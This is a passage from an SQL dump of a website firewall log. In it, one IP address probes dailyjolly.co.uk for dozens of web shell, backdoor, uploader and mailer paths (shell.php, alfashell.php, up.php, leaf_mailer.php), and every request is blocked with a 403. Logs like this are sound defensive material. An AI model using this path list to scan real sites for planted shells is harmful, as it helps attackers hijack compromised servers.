3.5.30729)\"}','QkWifjeFUAy1L6g50XoR9ZEN',0,1674320068.0861,211,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/system_log.php?http://dailyjolly.co.uk/system_log.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yiJLQVdHvn3z6I7eP2rbjDow',0,1674320070.3917,202,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/shells.php?http://dailyjolly.co.uk/shells.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iNyMGUTC0EhW95VzwSrxc23D',0,1674320072.8896,192,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/wp-atom.php?http://dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pyPA9uMlBbmsTYqr4JdiUfzZ',0,1674320075.4293,199,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/ubh/up.php?http://dailyjolly.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VGsyKlXS931x4g7cz0qNeA5E',0,1674320078.8062,168,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php?http://dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pIz1u3RUS0PFoYHnX9bmt7xJ',0,1674320083.2291,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/db-cache.php?http://dailyjolly.co.uk/wp-content/db-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KfpVPNO3ezDjsgAQY7b1uE9k',0,1674320086.3346,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/backup_index.php?http://dailyjolly.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7yzXRZAVJWTnlhBEfp46D5S3',0,1674320088.7196,175,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/themes/config.bak.php?http://dailyjolly.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wdFyKEWH4T1k8QzM6iC9uIr5',0,1674320093.3116,217,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/images/css.php?http://dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9v7CuFnIrao3HMAEXkcmbwjf',0,1674320094.8235,204,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/css/css.php?http://dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iTenLu24vrYpGKBAW7VhRaCf',0,1674320096.9892,176,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/uploads/wp-stream.php?http://dailyjolly.co.uk/wp-content/uploads/wp-stream.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UCzFApB5JxMWsh2arYloje6T',0,1674320099.7438,166,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-beckup.php?http://dailyjolly.co.uk/wp-beckup.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7ZXIBm8OE0TedNCikGKSUzFg',0,1674320104.5256,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-blog-post.php?http://dailyjolly.co.uk/wp-blog-post.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sJGFa6v7t0uABmpqEXwKIgDy',0,1674320106.3097,209,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/uploads/wp-blockdown.php?http://dailyjolly.co.uk/wp-content/uploads/wp-blockdown.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','a9UylxchRIgnHzvMbTme4o7w',0,1674320108.1432,178,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php?http://dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','doe6cSkR0V5PtKp7LyYgmn9X',0,1674320110.0812,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/style.php?http://dailyjolly.co.uk/wp-admin/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OIYi9G36eWFs8PfVXQrl12DH',0,1674320112.8007,185,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/6.php?http://dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yxz5Y0A8FkEMif7JNaCutsmR',0,1674320115.5538,175,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/7.php?http://dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3lae1VH745pZcIwfXvjuzA8b',0,1674320119.5229,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/8.php?http://dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nzMNeAS63819fRZtvWdmLFoY',0,1674320121.0305,184,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/9.php?http://dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UuVrQlx6BzwSMKJah49A2ycq',0,1674320123.4978,181,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/10.php?http://dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rbuIxslO5iMWKzGfJnmDZY6y',0,1674320126.3601,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp_class_datalib.php?http://dailyjolly.co.uk/wp_class_datalib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','H5nuOzWUr2esANEgIjD9tkVa',0,1674320129.0482,170,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/wp_class_datlib.php?http://dailyjolly.co.uk/wp-includes/wp_class_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DrXAqMznlOtZSCc5FUyaYmhB',0,1674320130.8462,171,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/pomo/wp_class_datalib.php?http://dailyjolly.co.uk/wp-includes/pomo/wp_class_datalib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4wkLRinWJq2jtXSrVhKxE9cm',0,1674320132.2100,163,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/01.php?http://dailyjolly.co.uk/01.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sueh5Po7xOVpr4MTLvEKjz1F',0,1674320135.5179,176,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/marijuana.php?http://dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EdASFruasHG9Y3zJ0Z84Ngvo',0,1674320140.0545,198,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1xleet.php?http://dailyjolly.co.uk/1xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nQU6PCf850IRdeoJkL2DHMxt',0,1674320142.5352,211,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/shell.php?http://dailyjolly.co.uk/wp-content/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RBzKTEpIPjQqy8J37uN01296',0,1674320146.4921,200,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/fw.php?http://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YTjcie6tSLVU1IJfqDPBZ530',0,1674320148.3481,180,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/shell.php?http://dailyjolly.co.uk/wp-admin/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','omsLkPQ29N1wuETY36IdxUhG',0,1674320150.6912,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/wp.php?http://dailyjolly.co.uk/wp-admin/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E8GSW4NxtmKL0AkzRQsi6O7b',0,1674320153.5250,168,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/4index.php?http://dailyjolly.co.uk/4index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PynVBF2IZrw4a5JhfU6e3Kou',0,1674320156.2604,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/5index.php?http://dailyjolly.co.uk/5index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wo7YzGBdHDcWZC5b6LXPs2FU',0,1674320157.5902,183,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/6index.php?http://dailyjolly.co.uk/6index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nZJSpbxakMDeFQOWAsGtyLNr',0,1674320160.7968,188,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/7index.php?http://dailyjolly.co.uk/7index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7lxhANun86riTwvIEJXft92V',0,1674320163.9770,180,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/8index.php?http://dailyjolly.co.uk/8index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','06gSQ3KPIJFW2fhkDORlyY7q',0,1674320172.4727,195,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/9index.php?http://dailyjolly.co.uk/9index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nS3akweb2H7ftzPsyET514lB',0,1674320175.5923,168,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Leaf.php?http://dailyjolly.co.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rH3QPuUKvjpN87D2wTGCfMX9',0,1674320179.2785,198,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Uploader.php?http://dailyjolly.co.uk/Uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Z5UJ9moIid42cKT1ONpVej6t',0,1674320183.6457,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-includes/wp-red.php?http://dailyjolly.co.uk/wp-includes/wp-red.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JQzaxP4bW5cusTRq0NeOSDX3',0,1674320187.6116,173,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.well-known/radio.php?http://dailyjolly.co.uk/.well-known/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','51T0SqYtPMlueIBidWOw8sFf',0,1674320190.7172,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfashell.php?http://dailyjolly.co.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','n4bMUH0C1KESo8a6TgDA7ZNp',0,1674320193.6401,179,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/am.php?http://dailyjolly.co.uk/am.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VWOjPJeIR1ClwpY8qxkz46sU',0,1674320195.9652,178,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/blog/fw.php?http://dailyjolly.co.uk/blog/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7ZohrQgOtlXP2vjm6wJ51cek',0,1674320198.8490,173,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/contacts.php?http://dailyjolly.co.uk/contacts.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TLf25yHrlqVQcgPmaExjDsNU',0,1674320201.0843,173,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/demo328/fw.php?http://dailyjolly.co.uk/demo328/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','W59NUinK3ReOHE7jV0gd6yrw',0,1674320205.4699,1641,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/gif.php?http://dailyjolly.co.uk/gif.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FTe56UBPDjI3tuGVZxRfmygz',0,1674320209.6119,233,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/goods.php?http://dailyjolly.co.uk/goods.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KS41sfpDmwJIZei59hCoEBP2',0,1674320211.2173,185,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/images/sym.php?http://dailyjolly.co.uk/images/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qkZ4KRlXILEGbiU1aMx5vz6H',0,1674320213.5812,177,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/lab.php?http://dailyjolly.co.uk/lab.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8l3x4ZKe9yiFTqJzgfQHMGdV',0,1674320216.9623,166,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leaf_mailer.php?http://dailyjolly.co.uk/leaf_mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i2uvbNFf0ByU4LASEZwkMCjG',0,1674320220.7595,191,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leaf_php.php?http://dailyjolly.co.uk/leaf_php.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VrBeixIgNzHW8c4up6wLaSYs',0,1674320223.6097,165,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/libraries/joomla/jmail.php?http://dailyjolly.co.uk/libraries/joomla/jmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HWCLOJz87iBsGjFxmowcDval',0,1674320226.3384,189,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/libraries/joomla/jmails.php?http://dailyjolly.co.uk/libraries/joomla/jmails.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MEXPLGmholnuzD4efFVdNJ3R',0,1674320228.6201,167,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mailer1.php?http://dailyjolly.co.uk/mailer1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','supg9UEnVxkMSjR2Xe6rDWtY',0,1674320231.1223,168,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ms.php?http://dailyjolly.co.uk/ms.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Me1DR7jlotnkCpAGyY0EU9Ws',0,1674320235.9829,211,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/rxr.php?http://dailyjolly.co.uk/rxr.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yNHAb0ZvkoUpMiIa8DJYCtxr',0,1674320238.3356,188,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/srx.php?http://dailyjolly.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','merUA89Bc1wqEyTbZQ473vMi',0,1674320241.1111,182,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/tuco.php?http://dailyjolly.co.uk/tuco.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','anFB5JD6y3IYG4UdolbECHsf',0,1674320244.9204,193,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/unix.php?http://dailyjolly.co.uk/unix.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8b6oMftwXkmVsOCyJpurGzlR',0,1674320249.5225,178,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/uploads/up.php?http://dailyjolly.co.uk/uploads/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nf6lXaNFwTQZHPruKhjbA8MJ',0,1674320252.0900,157,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php?http://dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','12qPN7DXaCBpWrfgbowTE953',0,1674320254.6091,163,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/css/fw.php?http://dailyjolly.co.uk/wp-admin/css/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','STBCGxa876qnO5cjmRFZ321w',0,1674320257.0600,182,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/includes/fw.php?http://dailyjolly.co.uk/wp-admin/includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IVqkCpXTZl65wcL4HF7iAEm3',0,1674320259.0247,194,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin/maint/fw.php?http://dailyjolly.co.uk/wp-admin/maint/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xTM2v7UQ8jtH4s9CLiqNYKnf',0,1674320261.5914,169,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?http://dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LDapyYXlz3OBdvPo1Kr9W5hE',0,1674320267.0595,212,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/xichang/x.php?http://dailyjolly.co.uk/wp-content/plugins/xichang/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1TfwhQ7kEuDHFl2s4RvMxoya',0,1674320269.1627,245,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/plugins/zedd/1.php?http://dailyjolly.co.uk/wp-content/plugins/zedd/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sytiXwUo8xkpHnGBZ46NSm91',0,1674320271.9248,175,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/up.php?http://dailyjolly.co.uk/wp-content/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','d6MCet9430PZUvqaO78BWL5g',0,1674320277.7084,242,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-content/wp.php?http://dailyjolly.co.uk/wp-content/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 